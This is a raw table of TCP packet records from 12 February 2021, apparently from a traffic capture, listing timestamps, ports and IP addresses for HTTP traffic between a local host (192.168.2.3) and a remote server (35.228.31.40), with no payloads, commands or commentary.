Feb 12, 2021 18:45:13.104441881 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104456902 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104464054 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104475975 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104502916 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104510069 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104547024 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104558945 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.106908083 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.181695938 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.242525101 CET	49750	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.328777075 CET	80	49750	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.328874111 CET	49750	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.330502987 CET	49750	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.405608892 CET	80	49750	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.280280113 CET	49751	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.281259060 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.357460022 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.357614040 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.358726978 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.358978987 CET	80	49751	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.359131098 CET	49751	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.475944042 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.759638071 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.759696007 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.759737968 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.759777069 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.759815931 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.759865046 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.759891987 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.759938955 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.760011911 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.800854921 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.800915003 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.800954103 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.800992012 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.801070929 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.804357052 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.836739063 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.836812019 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.836852074 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.836889982 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.836937904 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.836949110 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.836971045 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.836985111 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.836992979 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.837024927 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.837049961 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.837079048 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.837093115 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.837116003 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.837131023 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.837165117 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.841027975 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.841080904 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.841114998 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.841141939 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.843827009 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.843929052 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.877269030 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.877330065 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.877379894 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.877402067 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.880373955 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.880418062 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.880451918 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.880465031 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.880465031 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.880507946 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.880515099 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.880547047 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.880558968 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.880588055 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.880595922 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.880640030 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.913759947 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.913825035 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.913863897 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.913902998 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.913921118 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.913934946 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.913940907 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.913944006 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.913960934 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.913980961 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.913999081 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914020061 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914035082 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914060116 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914072990 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914108038 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914113045 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914179087 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914191008 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914217949 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914232016 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914261103 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914288998 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914299965 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914313078 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914331913 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.914351940 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.914383888 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.922900915 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.922955036 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.922997952 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.922997952 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923029900 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923034906 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.923053026 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923074961 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.923078060 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923114061 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.923125029 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923151970 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.923163891 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923192024 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.923202991 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923230886 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.923244953 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923279047 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.923284054 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.923332930 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.954071045 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.954119921 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.954159021 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.954205036 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.954231024 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.954257965 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.954261065 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.954263926 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.956726074 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.956768036 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.956792116 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.956806898 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.956818104 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.956845999 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.956857920 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.956887007 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.956892967 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.956940889 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991161108 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991219997 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991260052 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991297960 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991336107 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991358042 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991375923 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991379023 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991383076 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991385937 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991415024 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991427898 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991455078 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991466045 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991503000 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991503000 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991548061 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991550922 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991585970 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991596937 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991625071 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991636992 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991657019 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.991673946 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.991708994 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:15.999671936 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:15.999824047 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.005635977 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.005773067 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.005914927 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.005971909 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.006331921 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.006385088 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.006875992 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.006932974 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.006936073 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.006974936 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.006982088 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.007016897 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.007024050 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.007055998 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.007061958 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.007093906 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.007112026 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.007133961 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.007169008 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.007174969 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.007200003 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.007220030 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.007224083 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.007271051 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.009152889 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.009219885 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.009241104 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.009259939 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.009277105 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.009299040 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.009310961 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.009337902 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.009350061 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.009387016 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.010057926 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.010117054 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.030606985 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.030726910 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.044769049 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.044811964 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.044848919 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.044905901 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.044948101 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.044965029 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.044984102 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.044985056 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.044996977 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.045023918 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.045053959 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.045062065 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.045098066 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.045100927 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.045135021 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.045140028 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.045171976 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.045172930 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.045209885 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.045218945 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.045236111 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.045295000 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.047738075 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.047777891 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.047826052 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.047847986 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.047868013 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.047904968 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.047907114 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.047966957 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.049350977 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.049428940 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.067862034 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.068039894 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087204933 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087250948 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087291002 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087304115 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087330103 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087338924 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087368011 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087369919 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087385893 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087418079 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087424040 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087460041 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087472916 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087496042 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087512970 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087548971 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087573051 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087611914 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087641954 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087651014 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087666035 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087687969 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.087702990 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.087738037 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.090060949 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.090101004 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.090147018 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.090147972 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.090176105 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.090190887 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.090203047 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.090229034 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.090260983 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.090296030 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.092354059 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.092427969 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.107104063 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.107248068 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.128998995 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129055977 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129105091 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129146099 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129152060 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129183054 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129187107 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129190922 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129213095 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129220963 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129245996 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129260063 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129272938 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129303932 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129318953 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129342079 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129360914 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129379988 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129403114 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129463911 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129465103 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129513025 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.129524946 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.129571915 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132287979 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132339954 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132378101 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132395029 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132404089 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132452011 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132458925 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132489920 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132523060 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132527113 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132560968 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132565022 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132584095 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132601023 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132611990 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132638931 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132652998 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132677078 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132690907 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132724047 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.132726908 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.132781029 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.133761883 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.133842945 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.142576933 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.142752886 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.168962002 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.169025898 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.169055939 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.169095039 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.169126034 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.169156075 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.169172049 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.169213057 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.169244051 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.171772003 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.171828032 CET	80	49752	35.228.31.40	192.168.2.3
